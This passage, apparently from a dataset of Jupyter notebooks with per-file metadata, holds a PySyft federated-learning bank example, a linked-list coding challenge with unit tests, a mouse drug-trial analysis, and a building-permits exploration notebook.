"### Define each banks optimiser with 'remote' torchs",
"_____no_output_____"
]
],
[
[
"portuguese_bank_optimiser = portuguese_bank_remote_torch.optim.SGD(portuguese_bank_parameters, lr=1)",
"_____no_output_____"
],
[
"american_bank_optimiser = american_bank_remote_torch.optim.SGD(american_bank_parameters, lr=1)",
"_____no_output_____"
],
[
"australian_bank_optimiser = australian_bank_remote_torch.optim.SGD(australian_bank_parameters, lr=1)",
"_____no_output_____"
]
],
[
[
"### Finally, define the loss criterion for each",
"_____no_output_____"
]
],
[
[
"portuguese_bank_criterion = portuguese_bank_remote_torch.nn.BCELoss()",
"_____no_output_____"
],
[
"american_bank_criterion = american_bank_remote_torch.nn.BCELoss()",
"_____no_output_____"
],
[
"australian_bank_criterion = australian_bank_remote_torch.nn.BCELoss()",
"_____no_output_____"
],
[
"criterions = [portuguese_bank_criterion, american_bank_criterion, australian_bank_criterion]",
"_____no_output_____"
]
],
[
[
"## Train the Models",
"_____no_output_____"
]
],
[
[
"EPOCHS = 25\n\ndef train(criterion, epochs=EPOCHS):\n for e in range(1, epochs + 1):\n # Train Portuguese Bank's Model\n portuguese_bank_model.train()\n portuguese_bank_optimiser.zero_grad()\n portuguese_bank_pred = portuguese_bank_model(portuguese_bank_duet.store[0])\n portuguese_bank_loss = criterion[0](portuguese_bank_pred, portuguese_bank_duet.store[1])\n portuguese_bank_loss.backward()\n portuguese_bank_optimiser.step()\n local_portuguese_bank_loss = None\n local_portuguese_bank_loss = portuguese_bank_loss.get(\n name=\"loss\", \n reason=\"To evaluate training progress\", \n request_block=True, \n timeout_secs=5\n )\n if local_portuguese_bank_loss is not None:\n print(\"Epoch {}:\".format(e))\n print(\"Portuguese Bank Loss: {:.4}\".format(local_portuguese_bank_loss))\n else:\n print(\"Epoch {}:\".format(e))\n print(\"Portuguese Bank Loss: HIDDEN\")\n \n # Train American Bank's Model\n american_bank_model.train()\n american_bank_optimiser.zero_grad()\n american_bank_pred = american_bank_model(american_bank_duet.store[0])\n american_bank_loss = criterion[1](american_bank_pred, american_bank_duet.store[1])\n american_bank_loss.backward()\n american_bank_optimiser.step()\n local_american_bank_loss = None\n local_american_bank_loss = american_bank_loss.get(\n name=\"loss\", \n reason=\"To evaluate training progress\", \n request_block=True, \n timeout_secs=5\n )\n if local_american_bank_loss is not None:\n print(\"American Bank Loss: {:.4}\".format(local_american_bank_loss))\n else:\n print(\"American Bank Loss: HIDDEN\")\n \n # Train Australian Bank's Model\n australian_bank_model.train()\n australian_bank_optimiser.zero_grad()\n australian_bank_pred = australian_bank_model(australian_bank_duet.store[0])\n australian_bank_loss = criterion[2](australian_bank_pred, australian_bank_duet.store[1])\n australian_bank_loss.backward()\n australian_bank_optimiser.step()\n local_australian_bank_loss = None\n local_australian_bank_loss = australian_bank_loss.get(\n name=\"loss\", \n reason=\"To evaluate training progress\", \n request_block=True, \n timeout_secs=5\n )\n if local_australian_bank_loss is not None:\n print(\"Australian Bank Loss: {:.4}\".format(local_australian_bank_loss))\n else:\n print(\"Australian Bank Loss: HIDDEN\")\n\n return ([portuguese_bank_model, american_bank_model, australian_bank_model])\n\nmodels = train(criterions)",
"Epoch 1:\nPortuguese Bank Loss: 0.7693\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.7693\nEpoch 2:\nPortuguese Bank Loss: 0.5677\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.5712\nEpoch 3:\nPortuguese Bank Loss: 0.4772\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.4799\nEpoch 4:\nPortuguese Bank Loss: 0.4215\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.4237\nEpoch 5:\nPortuguese Bank Loss: 0.3855\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3875\nEpoch 6:\nPortuguese Bank Loss: 0.3613\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3632\nEpoch 7:\nPortuguese Bank Loss: 0.3442\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.346\nEpoch 8:\nPortuguese Bank Loss: 0.3318\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3335\nEpoch 9:\nPortuguese Bank Loss: 0.3224\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3241\nEpoch 10:\nPortuguese Bank Loss: 0.3152\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3169\nEpoch 11:\nPortuguese Bank Loss: 0.3096\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3113\nEpoch 12:\nPortuguese Bank Loss: 0.305\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3068\nEpoch 13:\nPortuguese Bank Loss: 0.3014\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3031\nEpoch 14:\nPortuguese Bank Loss: 0.2983\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.3001\nEpoch 15:\nPortuguese Bank Loss: 0.2958\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2976\nEpoch 16:\nPortuguese Bank Loss: 0.2937\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2955\nEpoch 17:\nPortuguese Bank Loss: 0.292\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2937\nEpoch 18:\nPortuguese Bank Loss: 0.2904\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2922\nEpoch 19:\nPortuguese Bank Loss: 0.2891\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2909\nEpoch 20:\nPortuguese Bank Loss: 0.288\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2897\nEpoch 21:\nPortuguese Bank Loss: 0.287\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2888\nEpoch 22:\nPortuguese Bank Loss: 0.2862\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2879\nEpoch 23:\nPortuguese Bank Loss: 0.2854\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2872\nEpoch 24:\nPortuguese Bank Loss: 0.2848\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2865\nEpoch 25:\nPortuguese Bank Loss: 0.2842\nAmerican Bank Loss: HIDDEN\nAustralian Bank Loss: 0.2859\n"
]
],
[
[
"## Localise the models again",
"_____no_output_____"
]
],
[
[
"# As you can see they are all still remote\nmodels",
"_____no_output_____"
],
[
"local_portuguese_bank_model = models[0].get(\n request_block=True,\n name=\"model_download\",\n reason=\"test evaluation\",\n timeout_secs=5\n )",
"> Downloading remote model\n> Creating local model\n Downloading remote layer: lr\n\n> Finished downloading remote model <\n\n\n"
],
[
"local_american_bank_model = models[1].get(\n request_block=True,\n name=\"model_download\",\n reason=\"test evaluation\",\n timeout_secs=5\n )",
"> Downloading remote model\n> Creating local model\n Downloading remote layer: lr\n\n> Finished downloading remote model <\n\n\n"
],
[
"local_australian_bank_model = models[2].get(\n request_block=True,\n name=\"model_download\",\n reason=\"test evaluation\",\n timeout_secs=5\n )",
"> Downloading remote model\n> Creating local model\n Downloading remote layer: lr\n\n> Finished downloading remote model <\n\n\n"
]
],
[
[
"### Average the three models into on local model",
"_____no_output_____"
]
],
[
[
"with torch.no_grad():\n local_model.lr.weight.set_(((local_portuguese_bank_model.lr.weight.data + local_american_bank_model.lr.weight.data + local_australian_bank_model.lr.weight.data) / 3))\n local_model.lr.bias.set_(((local_portuguese_bank_model.lr.bias.data + local_american_bank_model.lr.bias.data + local_australian_bank_model.lr.bias.data) / 3))",
"_____no_output_____"
]
],
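[
[
"# Not part of the original workflow: an illustrative sketch of the same averaging step\n# generalised to any number of banks. average_models is a made-up helper name, and it assumes\n# every model shares the single-layer LR architecture defined above.\ndef average_models(target_model, models):\n    # Federated averaging: overwrite the target's weights with the element-wise mean of all models\n    with torch.no_grad():\n        avg_weight = torch.mean(torch.stack([m.lr.weight.data for m in models]), dim=0)\n        avg_bias = torch.mean(torch.stack([m.lr.bias.data for m in models]), dim=0)\n        target_model.lr.weight.set_(avg_weight)\n        target_model.lr.bias.set_(avg_bias)\n    return target_model\n\n# Equivalent to the manual three-way average in the previous cell:\n# local_model = average_models(local_model, [local_portuguese_bank_model, local_american_bank_model, local_australian_bank_model])",
"_____no_output_____"
]
],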
[
[
"## Test the accuracy on the test set",
"_____no_output_____"
]
],
[
[
"def accuracy(model, x, y):\n out = model(x)\n correct = torch.abs(y - out) < 0.5\n return correct.float().mean()\n\nplain_accuracy = accuracy(local_model, test_data, test_target)\nprint(f\"Accuracy on plain test_set: {plain_accuracy}\")",
"Accuracy on plain test_set: 0.8976250290870667\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb534728ba3a3cca4c35199b5f4e67e254ae195a | 5,097 | ipynb | Jupyter Notebook | linked_lists/kth_to_last_elem/kth_to_last_elem_challenge.ipynb | benkeesey/interactive-coding-challenges | 4994452a729f4bcfab5c8a4225f2b5e004b79075 | [
"Apache-2.0"
] | 27,173 | 2015-07-06T12:36:05.000Z | 2022-03-31T23:56:41.000Z | linked_lists/kth_to_last_elem/kth_to_last_elem_challenge.ipynb | benkeesey/interactive-coding-challenges | 4994452a729f4bcfab5c8a4225f2b5e004b79075 | [
"Apache-2.0"
] | 143 | 2015-07-07T05:13:11.000Z | 2021-12-07T17:05:54.000Z | linked_lists/kth_to_last_elem/kth_to_last_elem_challenge.ipynb | benkeesey/interactive-coding-challenges | 4994452a729f4bcfab5c8a4225f2b5e004b79075 | [
"Apache-2.0"
] | 4,657 | 2015-07-06T13:28:02.000Z | 2022-03-31T10:11:28.000Z | 26.273196 | 303 | 0.54895 | [
[
[
"This notebook was prepared by [Donne Martin](http://donnemartin.com). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges).",
"_____no_output_____"
],
[
"# Challenge Notebook",
"_____no_output_____"
],
[
"## Problem: Find the kth to last element of a linked list.\n\n* [Constraints](#Constraints)\n* [Test Cases](#Test-Cases)\n* [Algorithm](#Algorithm)\n* [Code](#Code)\n* [Unit Test](#Unit-Test)\n* [Solution Notebook](#Solution-Notebook)",
"_____no_output_____"
],
[
"## Constraints\n\n* Can we assume this is a non-circular, singly linked list?\n * Yes\n* Can we assume k is a valid integer?\n * Yes\n* If k = 0, does this return the last element?\n * Yes\n* What happens if k is greater than or equal to the length of the linked list?\n * Return None\n* Can you use additional data structures?\n * No\n* Can we assume we already have a linked list class that can be used for this problem?\n * Yes",
"_____no_output_____"
],
[
"## Test Cases\n\n* Empty list -> None\n* k is >= the length of the linked list -> None\n* One element, k = 0 -> element\n* General case with many elements, k < length of linked list",
"_____no_output_____"
],
[
"## Algorithm\n\nRefer to the [Solution Notebook](http://nbviewer.ipython.org/github/donnemartin/interactive-coding-challenges/blob/master/linked_lists/kth_to_last_elem/kth_to_last_elem_solution.ipynb). If you are stuck and need a hint, the solution notebook's algorithm discussion might be a good place to start.",
"_____no_output_____"
],
[
"## Code",
"_____no_output_____"
]
],
[
[
"%run ../linked_list/linked_list.py\n%load ../linked_list/linked_list.py",
"_____no_output_____"
],
[
"class MyLinkedList(LinkedList):\n\n def kth_to_last_elem(self, k):\n # TODO: Implement me\n pass",
"_____no_output_____"
]
],
[
[
"## Unit Test",
"_____no_output_____"
],
[
"\n\n**The following unit test is expected to fail until you solve the challenge.**",
"_____no_output_____"
]
],
[
[
"# %load test_kth_to_last_elem.py\nimport unittest\n\n\nclass Test(unittest.TestCase):\n\n def test_kth_to_last_elem(self):\n print('Test: Empty list')\n linked_list = MyLinkedList(None)\n self.assertEqual(linked_list.kth_to_last_elem(0), None)\n\n print('Test: k >= len(list)')\n self.assertEqual(linked_list.kth_to_last_elem(100), None)\n\n print('Test: One element, k = 0')\n head = Node(2)\n linked_list = MyLinkedList(head)\n self.assertEqual(linked_list.kth_to_last_elem(0), 2)\n\n print('Test: General case')\n linked_list.insert_to_front(1)\n linked_list.insert_to_front(3)\n linked_list.insert_to_front(5)\n linked_list.insert_to_front(7)\n self.assertEqual(linked_list.kth_to_last_elem(2), 3)\n\n print('Success: test_kth_to_last_elem')\n\n\ndef main():\n test = Test()\n test.test_kth_to_last_elem()\n\n\nif __name__ == '__main__':\n main()",
"_____no_output_____"
]
],
[
[
"## Solution Notebook\n\nReview the [Solution Notebook](http://nbviewer.ipython.org/github/donnemartin/interactive-coding-challenges/blob/master/linked_lists/kth_to_last_elem/kth_to_last_elem_solution.ipynb) for a discussion on algorithms and code solutions.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb535ca62125f224fb9d1837b8b473c17ac56a61 | 418,124 | ipynb | Jupyter Notebook | additional_reference_notebooks/alec_calm_down.ipynb | hud-capstone/Data-and-Urban-Development | c27a900c7594f87aa8f3abd0d911484d1b331bb4 | [
"Unlicense"
] | null | null | null | additional_reference_notebooks/alec_calm_down.ipynb | hud-capstone/Data-and-Urban-Development | c27a900c7594f87aa8f3abd0d911484d1b331bb4 | [
"Unlicense"
] | null | null | null | additional_reference_notebooks/alec_calm_down.ipynb | hud-capstone/Data-and-Urban-Development | c27a900c7594f87aa8f3abd0d911484d1b331bb4 | [
"Unlicense"
] | null | null | null | 41.300277 | 138 | 0.262795 | [
[
[
"# import data science libraries\nimport numpy as np\nimport pandas as pd\n\nimport re\n\nimport os.path\nfrom os import path\n\nfrom datetime import datetime\n\n%matplotlib inline\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom scipy import stats\n\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler, PowerTransformer\nfrom sklearn.cluster import KMeans\n\nimport wrangle as wr\nimport preprocessing_permits as pr\nimport explore as ex\nimport model as mo\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")",
"_____no_output_____"
],
[
"# global setting for DataFrames and visualizations\npd.set_option(\"display.max_columns\", None)\nplt.rc(\"figure\", figsize=(16, 8))\nsns.set_palette(\"colorblind\")",
"_____no_output_____"
],
[
"df = wr.acquire_building_permits()\nprint(f\"\"\"Our DataFrame contains {df.shape[0]:,} observations and {df.shape[1]} features.\"\"\")\ndf",
"Our DataFrame contains 8,382 observations and 29 features.\n"
],
[
"df[\"city\"] = df.cbsa_name.str.split(\" \", 1, expand = True)[0]\n \ndf[\"state\"] = df.cbsa_name.str.split(\" \", 1, expand = True)[1]\n\ndf[\"major_city\"] = df.city.str.split(\"-\", 1, expand=True)[0]\n\ndf[\"major_state\"] = df.state.str.split(\"-\", 1, expand=True)[0]\n\ndf[\"metropolitan_area\"] = df.state.str.split(\"-\", 1, expand=True)[1]\n\ndf[\"metropolitan_area\"] = df.major_state.str.split(\" \", 1, expand=True)[1]\n\ndf[\"major_state\"] = df.major_state.str.split(\" \", 1, expand=True)[0]",
"_____no_output_____"
],
[
"df[(df.major_city == \"York\") & (df.major_state == \"PA\")]",
"_____no_output_____"
],
[
"df = wr.prep_building_permits(df)\nprint(f\"\"\"Our DataFrame contains {df.shape[0]:,} observations and {df.shape[1]} features.\"\"\")\ndf",
"Our DataFrame contains 8,269 observations and 30 features.\n"
],
[
"df[(df.major_city == \"York\") & (df.major_state == \"PA\")]",
"_____no_output_____"
],
[
"df[(df.major_city == \"Baltimore\") & (df.major_state == \"MD\")]",
"_____no_output_____"
],
[
"df.head(46)",
"_____no_output_____"
],
[
"df = pr.get_permits_model_df()\nprint(f\"\"\"Our modeling DataFrame contains {df.shape[0]:,} observations & {df.shape[1]} features\"\"\")\ndf.head(46)",
"Our modeling DataFrame contains 8,269 observations & 6 features\n"
],
[
"df[\"alec_test\"] = (\n df.sort_values([\"year\"])\n .groupby([\"city\", \"state\"])[[\"total_high_density_value\"]]\n .pct_change()\n)",
"_____no_output_____"
],
[
"df.tail(46)",
"_____no_output_____"
],
[
"df[\"new_field\"] = df.sort_values([\"year\"]).groupby([\"city\", \"state\", \"year\"])[[\"total_high_density_value\"]].pct_change()",
"_____no_output_____"
],
[
"(7485000.0 - 4566000.0) / 4566000.0",
"_____no_output_____"
],
[
"(12492000.0 - 30583000.0) / 30583000.0",
"_____no_output_____"
],
[
"(1 + 2.034637) / (1 + 0.231085)",
"_____no_output_____"
],
[
"df = pr.add_new_features(df)\nprint(f\"\"\"Our modeling DataFrame contains {df.shape[0]:,} observations & {df.shape[1]} features\"\"\")\ndf.head(46)",
"Our modeling DataFrame contains 8,269 observations & 17 features\n"
],
[
"(1 + -0.379118) / (1 + 0.062322)",
"_____no_output_____"
],
[
"df.groupby(\"year\").total_high_density_value.sum()",
"_____no_output_____"
],
[
"df.sample()",
"_____no_output_____"
],
[
"df.iloc[545:550]",
"_____no_output_____"
],
[
"(4.928300e+10 - 5.200240e+10) / 5.200240e+10",
"_____no_output_____"
],
[
"(217714000 - 473328000.0) / 473328000.0",
"_____no_output_____"
],
[
"(1 + 0.578019) / (1 + 0.313639)",
"_____no_output_____"
],
[
"df = pr.filter_top_cities_building_permits(df)\nprint(f\"\"\"Our modeling DataFrame contains {df.shape[0]:,} observations & {df.shape[1]} features\"\"\")\ndf.tail()",
"Our modeling DataFrame contains 2,990 observations & 18 features\n"
],
[
"(4.928300e+10 - 5.200240e+10) / 5.200240e+10",
"_____no_output_____"
],
[
"(1 + -0.508320) / (1 + -0.052294)",
"_____no_output_____"
],
[
"df.groupby(\"year\").total_high_density_value.sum()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb53667512c405ce2db8490a65e4532240d8f74a | 133,461 | ipynb | Jupyter Notebook | Pymaceuticals/pymaceuticals_starter.ipynb | JulietChristine/matplotlib-challenge | bca125d45549f56a098b39e20aa6837b56c2fe1f | [
"ADSL"
] | null | null | null | Pymaceuticals/pymaceuticals_starter.ipynb | JulietChristine/matplotlib-challenge | bca125d45549f56a098b39e20aa6837b56c2fe1f | [
"ADSL"
] | null | null | null | Pymaceuticals/pymaceuticals_starter.ipynb | JulietChristine/matplotlib-challenge | bca125d45549f56a098b39e20aa6837b56c2fe1f | [
"ADSL"
] | null | null | null | 93.199022 | 16,492 | 0.776661 | [
[
[
"## Observations and Insights ",
"_____no_output_____"
]
],
[
[
"# Dependencies and Setup\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy.stats as st\nimport numpy as np\nfrom scipy.stats import linregress\n# Study data files\nmouse_metadata_path = \"data/Mouse_metadata.csv\"\nstudy_results_path = \"data/Study_results.csv\"\n\n# Read the mouse data and the study results\nmouse_metadata = pd.read_csv(mouse_metadata_path)\nstudy_results = pd.read_csv(study_results_path)",
"_____no_output_____"
],
[
"#looking at the data\n# mouse_metadata.head(20)\n# study_results.head(20)\n#putting data together\nall_mouse_data = mouse_metadata.merge(study_results, on='Mouse ID')\nall_mouse_data.head()",
"_____no_output_____"
],
[
"# Checking the number of mice.\nmouse_count = len(all_mouse_data[\"Mouse ID\"].unique())\nmouse_count",
"_____no_output_____"
],
[
"# Getting the duplicate mice by ID number that shows up for Mouse ID and Timepoint. \nall_dups = len(all_mouse_data[\"Mouse ID\"])- mouse_count\nall_dups",
"_____no_output_____"
],
[
"# Optional: Get all the data for the duplicate mouse ID.\nall_counts = all_dups + mouse_count\nall_counts",
"_____no_output_____"
],
[
"# Find the duplicate mouse\nduplicate_mouse = all_mouse_data.loc[all_mouse_data.duplicated(subset=['Mouse ID', 'Timepoint']), 'Mouse ID'].unique()\nduplicate_mouse[0]",
"_____no_output_____"
],
[
"# Create a clean DataFrame by dropping the duplicate mouse by its ID.\nanalysis_df = all_mouse_data[all_mouse_data['Mouse ID'].isin(duplicate_mouse) == False]\nanalysis_df.head()",
"_____no_output_____"
],
[
"# Checking the number of mice in the clean DataFrame.\nmouse_count2 = len(analysis_df[\"Mouse ID\"].unique())\nmouse_count2",
"_____no_output_____"
]
],
[
[
"## Summary Statistics",
"_____no_output_____"
]
],
[
[
"# Generate a summary statistics table of mean, median, variance, standard deviation, and SEM of the tumor volume for each regimen\n\n# This method is the most straighforward, creating multiple series and putting them all together at the end.\nregimen_df = analysis_df.copy().groupby('Drug Regimen')\nmean = regimen_df.mean()['Tumor Volume (mm3)']\nmedian = regimen_df.median()['Tumor Volume (mm3)']\nvariance = regimen_df.var()['Tumor Volume (mm3)']\nstd_deviation = regimen_df.std()['Tumor Volume (mm3)']\nsem = regimen_df.sem()['Tumor Volume (mm3)']\n\nsummary_table = pd.DataFrame({\n 'Mean Volume': mean,\n 'Median Volume': median,\n 'Volume Variance': variance,\n 'Volume Std': std_deviation,\n 'Volume Std Err': sem\n})\nsummary_table",
"_____no_output_____"
],
[
"# Generate a summary statistics table of mean, median, variance, standard deviation, \n# and SEM of the tumor volume for each regimen\n# This method produces everything in a single groupby function\nanalysis_df.groupby('Drug Regimen').agg({\n 'Tumor Volume (mm3)': ['mean', 'median', 'var', 'std', 'sem']\n})",
"_____no_output_____"
]
],
[
[
"## Bar and Pie Charts",
"_____no_output_____"
]
],
[
[
"# Generate a bar plot showing the total number of mice for each treatment throughout the course of the study using pandas.\npandas_bar = analysis_df['Drug Regimen'].value_counts().plot(kind='bar', color = 'pink', title=\"Mouse Count Per Treatment\")",
"_____no_output_____"
],
[
"# Generate a bar plot showing the total number of mice for each treatment throughout the course of the study using pyplot.\nx_values = analysis_df['Drug Regimen'].unique()\nplt.bar(x=x_values, height=analysis_df['Drug Regimen'].value_counts().values, color=\"pink\", width=0.5)\nplt.xticks(rotation=90)\nplt.title(\"Mouse Count Per Treatment\")\nplt.show()",
"_____no_output_____"
],
[
"# Generate a pie plot showing the distribution of female versus male mice using pandas\ngender_dist = analysis_df['Sex'].value_counts()\ngender_pie = gender_dist.plot(kind='pie', colors = [\"purple\", \"pink\"], title= \"Gender Distibution\", legend=True)",
"_____no_output_____"
],
[
"# Generate a pie plot showing the distribution of female versus male mice using pyplot\ngender_counts = analysis_df['Sex'].value_counts()\nplt.pie(gender_counts, labels=gender_dist.index, colors=[\"purple\", \"pink\"])\nplt.title('Gender Distribution')\nplt.legend()\nplt.ylabel(\"Sex\")\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Quartiles, Outliers and Boxplots",
"_____no_output_____"
]
],
[
[
"# Start by getting the last (greatest) timepoint for each mouse\n# Using reset_index will return the series as a dataframe\nmax_df = analysis_df.groupby('Mouse ID')['Timepoint'].max().reset_index()\nmax_df",
"_____no_output_____"
],
[
"# Merge this group df with the original dataframe to get the tumor volume at the last timepoint\nmax_merge = analysis_df.merge(max_df, on=['Mouse ID', 'Timepoint'])",
"_____no_output_____"
],
[
"max_merge",
"_____no_output_____"
],
[
"# Put treatments into a list for for loop (and later for plot labels)\ntreatments = [\"Capomulin\", \"Ramicane\", \"Infubinol\", \"Ceftamin\"]\n# Create empty list to fill with tumor vol data (for plotting)\n\ntumor_vol = []\n# Calculate the IQR and quantitatively determine if there are any potential outliers.\n # Locate the rows which contain mice on each drug and get the tumor volumes\n # Determine outliers using upper and lower bounds\nfor treatment in treatments:\n final_volume = (max_merge.loc[max_merge[\"Drug Regimen\"]== treatment, \"Tumor Volume (mm3)\"])\n quartiles = np.quantile(final_volume, [0.25, 0.50, 0.75])\n lowerq = quartiles[0]\n higherq = quartiles[2]\n median = quartiles[1]\n iqr = higherq - lowerq\n lower_bound = lowerq - (1.5 * iqr)\n upper_bound = higherq + (1.5 * iqr)\n print(f'Quartile Data for {treatment}:')\n print(\"------------------------------------------\")\n print(f'Lower Quartile of Tumor Volumes: {round(lowerq, 2)}')\n print(f'Upper Quartile of Tumor Volmes: {round(higherq, 2)}')\n print(f'Inner Quartile Range is: {round(iqr, 2)}')\n print(f'Values below {round(lower_bound, 2)} could be outliers, and values above {round(upper_bound, 2)} could be outliers')\n print(\"------------------------------------------\")\n tumor_vol.append(final_volume)",
"Quartile Data for Capomulin:\n------------------------------------------\nLower Quartile of Tumor Volumes: 32.38\nUpper Quartile of Tumor Volmes: 40.16\nInner Quartile Range is: 7.78\nValues below 20.7 could be outliers, and values above 51.83 could be outliers\n------------------------------------------\nQuartile Data for Ramicane:\n------------------------------------------\nLower Quartile of Tumor Volumes: 31.56\nUpper Quartile of Tumor Volmes: 40.66\nInner Quartile Range is: 9.1\nValues below 17.91 could be outliers, and values above 54.31 could be outliers\n------------------------------------------\nQuartile Data for Infubinol:\n------------------------------------------\nLower Quartile of Tumor Volumes: 54.05\nUpper Quartile of Tumor Volmes: 65.53\nInner Quartile Range is: 11.48\nValues below 36.83 could be outliers, and values above 82.74 could be outliers\n------------------------------------------\nQuartile Data for Ceftamin:\n------------------------------------------\nLower Quartile of Tumor Volumes: 48.72\nUpper Quartile of Tumor Volmes: 64.3\nInner Quartile Range is: 15.58\nValues below 25.36 could be outliers, and values above 87.67 could be outliers\n------------------------------------------\n"
],
[
"# Generate a box plot of the final tumor volume of each mouse across four regimens of interest\npink_square = dict(markerfacecolor='pink', marker='s')\nfig, ax1 = plt.subplots()\nax1.set_title(\"Tumor Volume Across Four Regimens of Interest\")\nax1.set_ylabel(\"Volume\")\nax1.set_xlabel(\"Treatments\")\nax1.boxplot(tumor_vol, flierprops=pink_square )\nax1.set_xticklabels([\"Capomulin\", \"Ramicane\", \"Infubinol\", \"Ceftamin\"])\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Line and Scatter Plots",
"_____no_output_____"
]
],
[
[
"rando_mouse_df = analysis_df.loc[analysis_df['Drug Regimen']== \"Capomulin\",:]\nrando_mouse_df = rando_mouse_df.loc[rando_mouse_df[\"Mouse ID\"]==\"s185\",:]\n# Generate a line plot of time point versus tumor volume for a mouse treated with Capomulin\nplt.plot(rando_mouse_df[\"Tumor Volume (mm3)\"], rando_mouse_df[\"Timepoint\"], marker = \"o\", color=\"purple\")\nplt.xlabel('Average Tumor Volume')\nplt.ylabel('Timepoints')\nplt.title(\"Tumor Volume vs Time for Mouse s185\")\nplt.show()",
"_____no_output_____"
],
[
"# Generate a scatter plot of mouse weight versus average tumor volume for the Capomulin regimen\ncapomulin_df = analysis_df.copy().loc[analysis_df['Drug Regimen']== \"Capomulin\",:]\ncapomulin_df = capomulin_df.groupby(\"Mouse ID\")\navg_vol = capomulin_df[\"Tumor Volume (mm3)\"].mean()\nmouse_weight = capomulin_df[\"Weight (g)\"].unique().astype(int)\n\nplt.scatter(avg_vol, mouse_weight, color=\"hotpink\")\nplt.xlabel('Average Tumor Volume')\nplt.ylabel('Mouse Weight (g)')\nplt.plot(x_values,regress_values,\"r-\", color='purple')\nplt.title(\"Tumor Volume vs Weight\")\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Correlation and Regression",
"_____no_output_____"
]
],
[
[
"# Calculate the correlation coefficient and linear regression model \n# for mouse weight and average tumor volume for the Capomulin regimen\nx_values = avg_vol\ny_values = mouse_weight\n(slope, intercept, rvalue, pvalue, stderr) = linregress(x_values, y_values)\nregress_values = x_values * slope + intercept\nline_eq = \"y = \" + str(round(slope,2)) + \"x + \" + str(round(intercept,2))\ncorrelation = st.pearsonr(avg_vol, mouse_weight)\nprint(f'The equation of the line is {line_eq}, and the correlation coefficient is {round(correlation[0],2)}.')\nprint('This indicates a strong relationship between weight and tumor volume.')",
"The equation of the line is y = 0.74x + -10.15, and the correlation coefficient is 0.84.\nThis indicates a strong relationship between weight and tumor volume.\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb536d2c023d66b5799dcd838c1b6f70620aca54 | 59,388 | ipynb | Jupyter Notebook | Food Hub Coding Test.ipynb | manjunath0007/Food-Hub | 9fbb20e08a894871d0573ac58d7ffcf2b7bd6b89 | [
"MIT"
] | null | null | null | Food Hub Coding Test.ipynb | manjunath0007/Food-Hub | 9fbb20e08a894871d0573ac58d7ffcf2b7bd6b89 | [
"MIT"
] | null | null | null | Food Hub Coding Test.ipynb | manjunath0007/Food-Hub | 9fbb20e08a894871d0573ac58d7ffcf2b7bd6b89 | [
"MIT"
